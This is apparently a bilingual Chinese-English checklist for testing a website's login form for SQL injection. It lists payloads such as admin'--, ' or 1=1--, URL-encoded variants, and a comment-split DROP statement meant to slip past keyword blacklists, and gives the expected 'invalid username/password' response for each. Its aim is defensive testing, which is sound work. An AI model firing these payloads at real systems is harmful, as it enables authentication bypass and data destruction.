第一个输入字段我喜欢测试“搜索引擎”和“登录表单”的一个网站,最下面的例子是测试一个“登录表单”。你应该旨在抑制任何错误消息和服务器响应在生产环境中,把开发人员调试。我们将假定接收脚本有一个最严重的SQL语句:
1 SELECT * 2 FROM users 3 WHERE username='<submitted_username>' 4 AND password='<submitted_password>'
1.Random SQL(随机的SQL):一些随机的SQL类型的输入值,看看服务器返回一个消息
1 Username: SELECT Username FROM Users WHERE ID=1 2 Password: SELECT MD5(Password) FROM Users WHERE ID=1 -- evaluates to: SELECT * FROM users WHERE username='SELECT Username FROM Users WHERE ID=1' AND password='SELECT MD5(Password) FROM Users WHERE ID=1'
Result should be "invalid username/password". Suppress any other messages
2.wildcards(通配符):输入一个(*)作为输入值进而观察结
1 Username: * 2 Password: <Leave Blank> -- evaluates to: SELECT * FROM users WHERE username='*' AND password=''
Result should be "invalid username/password"
3.comments-dashdash 输入一个一个已知的用户名(如:admin)作为输入,以及后缀注释命令(如:--)
1 Username: admin'-- 2 Password: <Leave Blank> -- evaluates to: SELECT * FROM users WHERE username='admin'--' AND password='' Result should be "invalid username/password".
4.comments-hash 输入一个一个已知的用户名(如:admin)作为输入,以及后缀注释命令(如:#)
1 Username: admin'# 2 Password: <Leave Blank> -- evaluates to: SELECT * FROM users WHERE username='admin'#' AND password='' Result should be "invalid username/password"
5.Comments - bypassing pattern matches (绕过模式的匹配) 测试目标主机系统正在寻找诸如DROP关键字或避免的黑名单
1 Username: ';DR/**/OP tempTable; 2 Password: <Leave Blank> -- evaluates to: SELECT * FROM users WHERE username='';DROP tempTable;' AND password=''
5.The Classic 输入以下命令“ 'OR 1=1--”作为输入值,用知道存在的用户名替代“admin”
1 Username: admin 2 Password: ' or 1=1-- -- evaluates to: SELECT * FROM users WHERE username='admin' AND password='' OR 1=1--' Quick variations of this: #这主要要看返回的什么错误,然后在具体应用 admin' -- admin' # admin'/* ' or 1=1-- ' or 1=1# ' or 1=1/* ') or '1'='1-- ') or ('1'='1--
7.Variations of the Classic: Comments 根据具体的系统,尝试输入注释语法,用知道存在的用户名替代“admin”
1 Username: admin 2 Password: ' or 1=1 --IamJOE -- evaluates to: SELECT * FROM users WHERE username='admin' AND password='' OR 1=1 --IamJOE'
8.Variations of the Classic: Empty 输入如:' or ' '=',用知道存在的用户名替换“admin”
1 Username: admin 2 Password: ' or ''=' -- evaluates to: SELECT * FROM users WHERE username='admin' AND password=' ' OR ''=''
9.Variations of the Classic: NewLines(换行符) 某些脚本无法解析一个换行符,它是另一个查询或脚本修整提交的最后一行,用存在知道的用户名替“admin”
1 Username: admin
2 Password: '
OR 1=1--
-- evaluates to:
SELECT * FROM users WHERE username='admin' AND password=''
OR 1=1--'
**New lines in SQL should be understood as
.
10.Variations of the Classic: URL Encoded 尽管可以躲避掉转义',这里最有可能通过一个系统得到攻击。事实,所有在此页面上的攻击,可以将网址编码。键入以下内容:%27%20or%20%27%27%3D%27的输入值。
1 Username: admin 2 Password: %27%20or%20%27%27%3D%27 -- evaluates to: SELECT * FROM users WHERE username='admin' AND password='' OR ''='
11.Guest Password 如果知道一个有效的username/password,check that your scripts do not validate on password alone.(空密码)
1 Username: Guest 2 Password: <Password you know exists in system> -- evaluates to: SELECT * FROM users WHERE username='Guest' AND password='<known_password>'